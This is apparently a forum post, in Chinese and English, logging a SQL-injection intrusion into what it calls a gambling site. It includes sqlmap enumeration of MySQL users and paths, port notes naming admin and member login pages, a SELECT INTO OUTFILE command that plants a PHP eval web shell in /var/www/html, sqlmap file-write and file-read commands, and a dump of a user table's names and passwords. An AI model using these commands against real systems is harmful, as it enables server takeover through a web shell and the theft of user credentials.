current-user: developer@%
select @@BASEDIR: '/usr/'
select USER(): '[email protected]'
select DATABASE(): 'edc'
select SYSTEM_USER(): '[email protected]'
select @@CHARACTER_SETS_DIR: '/usr/share/mysql/charsets/'
select @@CHARACTER_SET_CLIENT: 'utf8'
select @@DATADIR: '/var/lib/mysql/'
select @@CHARACTER_SET_SERVER: 'latin1'
888 端口 是apache默认首页 得到绝对路径 /var/www/html/
9090 端口 是赌博站管理登录地址
9091 端口 是赌博站会员登录地址
db_test 当前数据库
[19:54:48] [INFO] resumed: 'root'@'localhost'
[19:54:48] [INFO] resumed: 'developer'@'localhost'
[19:54:48] [INFO] resumed: 'root'@'127.0.0.1'
[19:54:48] [INFO] resumed: 'syncopy'@'222.xxx.xxx.xxx'
[19:54:48] [INFO] resumed: 'mlh'@'localhost'
[19:54:48] [INFO] resumed: 'developer'@'%'
[19:54:48] [INFO] resumed: 'mlh'@'%'
[19:54:48] [INFO] resumed: 'edc'@'%'
[19:54:48] [INFO] resumed: '6hc_nav'@'%'
sqlmap --sql-shell
select "<?php eval($_POST['x']);?>" into outfile "/var/www/html/25u_ft/1.php"
--file-write "/localhost/shell.php" --file-dest "/var/www/html/25u_ft/test.php"
--file-read "/var/www/html/25u_ft/info.php"
-D "10fenft" -T "g_user" -C "g_name,g_password" --dump
25u_new.rar (10.481 MB) 下载附件
点击收藏 | 0 关注 | 1